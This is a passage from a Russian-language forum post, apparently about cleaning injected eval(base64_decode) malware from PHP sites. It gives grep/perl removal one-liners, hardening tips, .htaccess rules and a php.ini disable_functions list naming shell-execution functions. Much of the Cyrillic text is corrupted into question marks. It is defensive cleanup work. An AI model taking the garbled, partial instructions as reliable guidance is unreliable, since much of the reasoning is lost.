cat malware2 | xargs grep -Rils 'DQplcnJ' | xargs perl -pi -e 's/eval\(base64_decode\(\"DQplcn.*fQ0KfQ\=\="\)\)\;//g' &
cat malware2 | xargs grep -Rils 'DQplcnJ' | xargs perl -pi -e 's/eval\(base64_decode\(\"DQplcn.*Cn0NCn0\=\"\)\)\;//g' &
cat malware2 | xargs grep -Rils 'DQplcnJ' | xargs perl -pi -e 's/eval\(base64_decode\(\"DQplcn.*DQp9DQp9\"\)\)\;//g' &


??????? ?????? ??????? ???????? ? ????? ???? ??????, ???? ??????? ????:
Код:
cat malware1 | xargs grep -Rils '???????_??_??????_???????_???????_??_??????_3'




???????????? ?????? ?? ???????

?? ??????, ??? ??? ??????, ??? ?????? ?????????? ???????????? ????, ?????????? ???????? ????? ?????? ????? ? ??? ?????? ???????? ?????????????? ???????, ????? ???????? ?????? ? ?????? ?????. ?? ?????????? ???????, ????? "?????? ????????? ????" ??? ? ???????? ???????? ???? ????? ?? ????????? ??????. ?????? ?????, ???????????? ????? ???????? ??????? ?????? ?? ????? ?? ????????. ??? ?????????? ??????? ???? ????????? ????? ??????????? ?????. ????? ???????? ?????????? ????????? ??????????? ??? ????????????? ?????.
??? ???????????? ???? ??????? ?? ???????????? ????, ? ????? ???? ?? ??????? ??????
??????, ??? ????????? ???? ?? ???????, ????????? ??????????? ??? ??????????, ?? ??????? ????? ?????????? ????? ????? ? ? ??????? ?? ??????????? ?????????????????. ??????? ???????? ?????????;
??????????? ????? ?????? CMS ? ???? ????????/????????/???????? ??? ?????, ????????? ??????? ??????????. ???????? ????? ????????, ??? nulled-?????? (?? ????????????) CMS ????? ????? ??? ???????????;
???????????? ?????? - ???????????? ?????. ??????? ?????? ???????????? ? ?? ????????????? ???????? ???????????? ???????;
?????????? ?? ????????? ????????? ?????? ? ?????????? ?????? ????????????, ? ?? ??????????? ?????????? ?????????? ???????????? ??? ??????? - ??? ?? ?????????? ????? ???? ?? ????? ?? ?????? ?????????;
???????? ?? ??????? ?????? ????????? ????? (??????) ??????. ??? ?????? ????????? ????????? ???? ?? ??????? ? ????????? ??? ?????????, ???????? ??? ?????, ????? ?? ?????? ?????? ???????????? ????? ?????. ??????????? ????????? ?????? ?????????? ??????????? ? ?????? ?????????? ???????? ISPmanager (???? ?? ??????????? ??). ?????????? ?????;
?????? ????? ????? - ??? ?????????? ? ??????? ??????? 777 (????????, uploads), ???? ?????????????? ????? ????????? ??????????? ???????. ????????? ?????????? ???? ? ??????? .htaccess ? ????? ???????????. ??? ????? ???????? ???? ? ?????? .htaccess ? ??????????? ?????????? ? ????????? ??????????:
RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
? ????? ???????????? PHP (php.ini) ????????? ?????????????? ??????? ?? ?????? ? ????? disable_functions (???????????? ???????):
disable_functions = exec, mail, passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec, parse_ini_file, show_source
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
Показать сообщения:   
Начать новую тему   Ответить на тему    Список форумов newssoft.ru -> ????????? ??????? Часовой пояс: GMT + 3
Страница 1 из 1

 
Перейти:  
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах


Powered by phpBB © 2001, 2005 phpBB Group
AllSat 22  - photographe de mariage - 2006